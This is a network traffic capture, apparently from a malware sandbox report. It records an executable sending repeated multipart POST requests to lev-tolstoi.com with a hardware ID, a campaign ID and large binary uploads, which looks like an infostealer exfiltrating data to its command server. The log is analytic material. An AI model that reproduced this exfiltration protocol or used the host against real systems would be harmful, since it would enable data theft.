78 42 64 4c 6a 63 50 6f 52 75 4d 36 30 50 35 65 6a 4f 32 Data Ascii: 21WDDN3KkYzOLfJNGEkWXiPEVskPQCiX8miQuA3bvt6ZVcaPXIzVyd8r4srLiVUPd1dXyo9C64Th+ZI+GU5vFNnTx80ez9KNDe/wyBiLEp4lw8cb3YItl/fonP/Zya4Fl9SDih3NU18I/7ccmkuGCXFG1MoNQCvFovvQPFyN71QZE4NOHo5RDY/sc87aSpffpddEmExF+5Hx8tC6nkm+0sgXU05cHgZfDi6yjZpLl54gxBdLjcPoRuM60P5ejO2
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 6f 79 50 47 41 42 50 44 61 31 7a 7a 39 74 4c 56 74 76 68 42 74 4f 49 54 73 46 76 42 57 4d 35 30 6a 31 65 6a 57 39 55 6d 56 49 48 7a 64 38 4f 30 70 38 63 76 44 43 4b 69 35 36 47 46 36 53 43 31 59 6d 4f 68 6d 6c 48 6f 54 30 53 4f 67 33 65 50 74 46 61 56 56 4e 5a 6d 6f 6f 56 6a 73 6a 2f 74 78 79 61 53 34 59 4a 63 55 62 56 53 63 78 43 61 41 4e 67 75 52 4b 39 33 34 2f 76 31 78 74 52 41 6b 36 65 7a 31 43 4d 44 65 33 78 6a 31 71 4b 31 5a 30 69 6c 30 53 59 54 45 58 37 6b 66 48 77 31 37 37 65 7a 76 37 53 79 42 64 54 54 6c 77 65 42 6c 38 4d 4c 37 41 4d 6d 51 6b 58 48 69 44 46 31 6b 68 50 51 79 68 47 34 48 6d 53 76 68 38 50 37 70 53 61 30 34 47 4f 48 45 37 52 7a 70 38 2f 6f 55 31 64 6d 49 41 50 61 55 47 55 53 30 78 54 37 46 52 6e 71 4a 43 39 44 64 75 2b 31 39 69 51 Data Ascii: oyPGABPDa1zz9tLVtvhBtOITsFvBWM50j1ejW9UmVIHzd8O0p8cvDCKi56GF6SC1YmOhmlHoT0SOg3ePtFaVVNZmooVjsj/txyaS4YJcUbVScxCaANguRK934/v1xtRAk6ez1CMDe3xj1qK1Z0il0SYTEX7kfHw177ezv7SyBdTTlweBl8ML7AMmQkXHiDF1khPQyhG4HmSvh8P7pSa04GOHE7Rzp8/oU1dmIAPaUGUS0xT7FRnqJC9Ddu+19iQ
2024-12-18 10:33:11 UTC	316	IN	Data Raw: 67 41 57 52 38 6e 38 49 6b 62 51 31 62 62 49 78 64 45 6d 45 78 47 65 35 48 78 39 77 46 36 6e 51 6d 75 46 74 2f 65 6b 31 6d 5a 51 59 42 4e 79 71 33 31 54 46 34 4b 56 56 78 6c 43 4d 63 65 57 4a 64 2f 45 33 56 73 46 71 34 61 41 6e 31 46 47 38 45 56 51 64 6c 65 46 64 38 5a 4f 4b 4c 63 6e 78 69 41 44 33 43 48 6b 34 7a 4d 41 79 34 48 4d 44 63 65 39 39 68 50 4c 78 45 61 56 4d 43 66 6a 4a 34 54 6e 78 6b 69 59 55 37 61 54 6c 4a 61 34 67 4e 57 32 45 4a 51 65 34 48 78 37 6f 46 7a 58 51 34 74 56 4e 34 56 55 41 5a 61 6a 4a 47 4c 44 75 6e 79 6e 49 67 59 6c 34 39 33 55 34 53 59 54 49 65 37 6b 66 58 73 42 36 74 4a 47 48 72 42 6e 45 4b 46 48 35 71 65 42 6c 75 63 76 44 58 63 6a 5a 69 48 33 36 58 44 31 6f 69 49 41 7a 70 49 62 6e 46 58 2f 56 78 49 61 70 71 55 45 4d 58 4d 33 Data Ascii: gAWR8n8IkbQ1bbIxdEmExGe5Hx9wF6nQmuFt/ek1mZQYBNyq31TF4KVVxlCMceWJd/E3VsFq4aAn1FG8EVQdleFd8ZOKLcnxiAD3CHk4zMAy4HMDce99hPLxEaVMCfjJ4TnxkiYU7aTlJa4gNW2EJQe4Hx7oFzXQ4tVN4VUAZajJGLDunynIgYl493U4SYTIe7kfXsB6tJGHrBnEKFH5qeBlucvDXcjZiH36XD1oiIAzpIbnFX/VxIapqUEMXM3
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 32 62 65 37 0d 0a 31 30 45 63 58 68 50 71 67 37 48 75 68 57 71 4c 47 50 6f 41 7a 34 57 45 6e 42 6c 65 46 64 38 5a 4f 4b 4c 63 6e 78 69 41 44 33 43 48 6b 34 7a 4d 41 79 34 48 4d 44 63 65 39 5a 77 4d 4c 35 54 66 67 59 6a 4e 57 67 2f 41 58 4a 38 76 34 56 71 56 32 49 51 50 62 70 54 48 44 6c 32 56 2b 34 71 68 4f 78 4c 2f 32 45 6e 39 6e 70 70 51 67 67 35 62 48 70 76 4e 79 69 33 68 58 77 75 4a 42 67 6c 31 56 4d 63 4a 53 64 50 39 6b 2f 56 75 52 43 72 49 47 62 70 53 79 42 64 54 53 67 38 59 42 4e 79 66 4b 4b 46 61 69 35 6c 57 32 2b 58 47 31 38 33 4e 55 69 51 49 59 54 30 53 50 64 38 4e 34 56 71 51 45 6b 4d 50 58 4a 36 63 43 6f 78 6f 4d 59 33 61 52 78 6d 63 34 49 4a 57 79 38 77 44 2b 35 52 78 2b 30 46 6f 45 35 32 38 78 52 52 43 6b 30 6d 50 47 41 42 43 54 2b 2b 79 7a Data Ascii: 2be710EcXhPqg7HuhWqLGPoAz4WEnBleFd8ZOKLcnxiAD3CHk4zMAy4HMDce9ZwML5TfgYjNWg/AXJ8v4VqV2IQPbpTHDl2V+4qhOxL/2En9nppQgg5bHpvNyi3hXwuJBgl1VMcJSdP9k/VuRCrIGbpSyBdTSg8YBNyfKKFai5lW2+XG183NUiQIYT0SPd8N4VqQEkMPXJ6cCoxoMY3aRxmc4IJWy8wD+5Rx+0FoE528xRRCk0mPGABCT++yz
2024-12-18 10:33:11 UTC	1369	IN	Data Raw: 61 38 56 46 44 6d 39 32 48 65 35 48 78 36 56 47 36 6d 55 77 75 45 4a 74 41 7a 4d 41 57 7a 5a 47 50 53 71 67 79 44 35 50 49 55 6c 33 75 79 4e 4a 49 6a 67 42 71 51 6d 57 6f 67 75 34 65 48 62 6a 62 53 34 4d 54 51 45 79 65 46 6c 38 5a 50 44 77 4d 57 41 73 58 32 75 55 55 48 73 76 4d 51 36 34 44 34 72 75 5a 50 74 6d 50 50 73 61 4c 6b 4a 4e 5a 69 35 32 41 54 67 74 38 4a 31 69 50 48 6b 4e 4c 74 4a 4e 44 6a 35 34 46 75 34 4a 78 37 6f 58 74 6a 63 6b 2b 77 77 75 41 77 34 73 62 6a 35 43 4b 6a 2f 33 2b 77 78 4c 4e 56 74 74 67 78 35 69 48 78 30 44 71 42 69 64 35 55 50 65 56 33 62 31 46 47 45 45 56 51 63 38 63 41 45 44 63 76 44 64 63 6a 5a 69 62 58 36 4c 45 31 73 33 4a 30 4b 4c 43 49 54 79 51 2f 73 33 65 50 74 53 4c 68 78 64 63 44 77 38 55 48 78 6b 34 4a 64 70 4f 33 45 Data Ascii: a8VFDm92He5Hx6VG6mUwuEJtAzMAWzZGPSqgyD5PIUl3uyNJIjgBqQmWogu4eHbjbS4MTQEyeFl8ZPDwMWAsX2uUUHsvMQ64D4ruZPtmPPsaLkJNZi52ATgt8J1iPHkNLtJNDj54Fu4Jx7oXtjck+wwuAw4sbj5CKj/3+wxLNVttgx5iHx0DqBid5UPeV3b1FGEEVQc8cAEDcvDdcjZibX6LE1s3J0KLCITyQ/s3ePtSLhxdcDw8UHxk4JdpO3E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49713	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:12 UTC	294	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12914 Host: lev-tolstoi.com
2024-12-18 10:33:12 UTC	12914	OUT	Data Raw: 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 52 44 32 34 52 5a 37 5a 42 4e 52 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a Data Ascii: --PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--PRD24RZ7ZBNRVVVVVVVVVVVVVVVVVVVContent-Disposition:
2024-12-18 10:33:15 UTC	1034	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9pfe3pdsgpkuupfmkdbnti04it; expires=Sun, 13-Apr-2025 04:19:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xl9Xy8mReZ28R6hRroAtqGm1RsrZWM6SGEIAd17HTrM2AJpk4IK7AI507RHlClYjgHZK6pkOqL2B7zKu4WDAGUcS9SnYMDxn5n9%2FBxI8IETMhI3UmSpq9GTE0TiDDg6UDGI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e5139c67ce4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1832&rtt_var=699&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13866&delivery_rate=1593886&cwnd=228&unsent_bytes=0&cid=03d12b4dc1bf013b&ts=2280&x=0"
2024-12-18 10:33:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:33:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:16 UTC	290	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=GQQ2DS1FJFJFFVVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15132 Host: lev-tolstoi.com
2024-12-18 10:33:16 UTC	15132	OUT	Data Raw: 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 51 51 32 44 53 31 46 4a 46 4a 46 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 Data Ascii: --GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"2--GQQ2DS1FJFJFFVVVVVVVVVVVVVVContent-Disposition: form-data;
2024-12-18 10:33:18 UTC	1042	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qtlrn7llhhmlu1b2re8en2dnm2; expires=Sun, 13-Apr-2025 04:19:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZTrEbdSBg63Wv2iM6%2BTKoZFb8dHz6qZjyEfcb3reSzWT244q5rVR48zr0zR8Z72l4syPLldhwpjTSAMunfoOI6u%2FNulfFdty6VxqcddrEk1uukx%2FB9Dh%2B41WEheWJxW%2F0M%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e697dff0fa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1470&min_rtt=1467&rtt_var=556&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=16080&delivery_rate=1955793&cwnd=190&unsent_bytes=0&cid=5ef86fe2b6d8a241&ts=1251&x=0"
2024-12-18 10:33:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:33:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49724	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:19 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ESPXYNHJ3ZZNBVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20616 Host: lev-tolstoi.com
2024-12-18 10:33:19 UTC	15331	OUT	Data Raw: 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 45 53 50 58 59 4e 48 4a 33 5a 5a 4e 42 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d Data Ascii: --ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"3--ESPXYNHJ3ZZNBVVVVVVVVVVVVVContent-Disposition: form-data; nam
2024-12-18 10:33:19 UTC	5285	OUT	Data Raw: cd e4 cf 67 a2 84 e9 ea 99 52 b9 38 d6 94 8e 12 66 2b 13 61 42 a1 99 d0 17 25 34 f2 93 f5 b1 05 a9 66 42 b5 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: gR8f+aB%4fBZ>56vMMZh'F3Wun 4F([:7s~
2024-12-18 10:33:20 UTC	1040	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o99uq0le9jft0uo1hpj8munado; expires=Sun, 13-Apr-2025 04:19:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzdIl4Cb7qqXmYInY5PNWzomvFgT%2FYWcOUCU46tusmI0JIosMoOQ7gSv%2FWjXMi8cvRD35Xnez6BeLrNLtX8H27OHESbX3hKH%2FhUmNV%2Bw3anWadfJDbkFvqtUeGuvbimHhRE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e79fd931921-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1497&rtt_var=577&sent=15&recv=24&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21585&delivery_rate=1871794&cwnd=139&unsent_bytes=0&cid=bc45bed07831b5f4&ts=883&x=0"
2024-12-18 10:33:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:33:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49731	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:21 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IFJI9R3F3ZFVVVVVVVVVVVVVVVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1333 Host: lev-tolstoi.com
2024-12-18 10:33:21 UTC	1333	OUT	Data Raw: 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 46 4a 49 39 52 33 46 33 5a 46 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d Data Ascii: --IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-data; name="pid"1--IFJI9R3F3ZFVVVVVVVVVVVVVVVVVVContent-Disposition: form-
2024-12-18 10:33:22 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:33:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f2721k6b8fah5qhsjoifq94jt1; expires=Sun, 13-Apr-2025 04:20:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h%2B9j1%2BRijXh9NQboZk0Px9HIwnQUSnYu98VnGuHWeJOHn%2FKlyk2ekFM3ak9V%2BKrqXs34AfK88a0RghC8a6bFVb8RJbnxNW4wn2EsCp%2Fdt5orv3lJjei5AMxgip%2BpqS9OsWE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e7e898b618ce9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=1872&rtt_var=812&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2260&delivery_rate=1559829&cwnd=231&unsent_bytes=0&cid=ba6c426bf311e132&ts=757&x=0"
2024-12-18 10:33:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-18 10:33:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49738	104.21.66.86	443	6596	C:\Users\user\Desktop\1fxm3u0d.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:33:24 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SSHF8DNVNZFFVVVV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569058 Host: lev-tolstoi.com
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 43 42 34 42 37 45 39 36 31 34 30 34 31 30 41 41 34 39 32 32 36 33 37 33 37 34 44 36 43 32 0d 0a 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 53 48 46 38 44 4e 56 4e 5a 46 46 56 56 56 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 55 6e 69 71 75 65 0d 0a 2d 2d 53 Data Ascii: --SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="hwid"AFCB4B7E96140410AA4922637374D6C2--SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="pid"1--SSHF8DNVNZFFVVVVContent-Disposition: form-data; name="lid"FATE99--Unique--S
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: c3 17 24 66 5f af f5 ef 77 c0 00 95 f9 da de 82 a5 7a 05 c6 48 39 4b 69 70 24 2c a5 1c 40 00 b1 13 c4 d8 43 29 12 40 69 02 ca 6a 84 33 4f b8 32 5c 85 41 bb 2a 16 e6 e3 60 d9 b6 e8 f0 4c b1 f5 7d 1c 8f 1d e0 b1 ef bc 2d 1a 84 57 74 74 77 63 fb 4c f9 ad fe ff 07 d1 a9 07 00 ad b8 03 cc f1 81 04 53 4a 3e 0b 30 fb f8 60 7e aa d2 a5 cc 88 c8 32 cb c5 de cc 72 7e 88 fb 0f d1 f8 b1 39 83 4b 34 b2 ef b4 81 18 87 64 10 6f e1 90 9a e9 e4 c1 07 9a 15 57 03 4d d1 71 3b 9e 39 95 41 0a 6a 30 65 07 af 44 93 ea bf f5 21 3d 22 f1 13 82 5b bb 65 68 ce 1c 28 76 a4 26 f9 f9 f2 a4 1a 77 4a 2b 89 52 6d 21 4f 1e 82 e5 7a 4b 80 8d 1b 77 ba a4 14 53 74 0e 33 6f 92 b1 dd 1c e0 aa c8 6a 70 16 e5 10 d6 14 6b 7b cd 4d c7 d7 1d 95 28 24 46 16 92 e8 ac 6a ce e4 ae 00 ff 3d 54 6d 74 90 Data Ascii: $f_wzH9Kip$,@C)@ij3O2\A*`L}-WttwcLSJ>0`~2r~9K4doWMq;9Aj0eD!="[eh(v&wJ+Rm!OzKwSt3ojpk{M($Fj=Tmt
2024-12-18 10:33:24 UTC	15331	OUT	Data Raw: d6 8b da 4d 80 b1 3a ff 25 34 b9 77 0a 14 13 52 ee 32 c9 a2 36 13 db 31 3d 2e 8d e1 01 a7 32 22 1e 88 ea 0d d7 ba 46 f2 94 30 b0 da 26 75 da 52 4d c4 51 95 ff 6d 52 8d d5 17 cb 67 21 b4 6d 68 5e 6c 6a cd cd 17 9a fe 7d 24 50 1d 09 aa 8c 1a 5d 3f e2 32 e8 6a 6c 26 92 9b ca 08 bf 34 4f 5e 72 b1 80 83 4e 93 f1 3e 89 8b d6 2a d5 89 3b 19 a1 44 d3 67 16 71 47 d0 04 14 3b ad 78 e5 ab c2 7a 9d a4 bb 0a c3 70 52 a9 31 78 1a d5 58 5e 81 78 de e4 7c 13 2f 81 3d 6a c5 89 35 fa 3b 08 2c da 67 33 82 17 5f 7e 39 56 fa db bd b0 ce f2 ec 15 1e 2d f3 cf 9c 6c 86 06 1f 46 92 73 26 81 b7 27 ad bd 5d 11 a1 73 7e 0b fd fd 61 33 73 67 63 b3 e6 df 6b 21 e1 dd b4 5c f7 72 32 8a d0 f6 b4 f6 fb 66 ab 2c f2 3f 75 de 22 58 84 7e db 68 fe 53 14 55 ff c7 c5 8e 0e 95 c6 d0 bd ac b1 8c Data Ascii: M:%4wR261=.2"F0&uRMQmRg!mh^lj}$P]?2jl&4O^rN>*;DgqG;xzpR1xX^x\|/=j5;,g3_~9V-lFs&']s~a3sgck!\r2f,?u"X~hSU
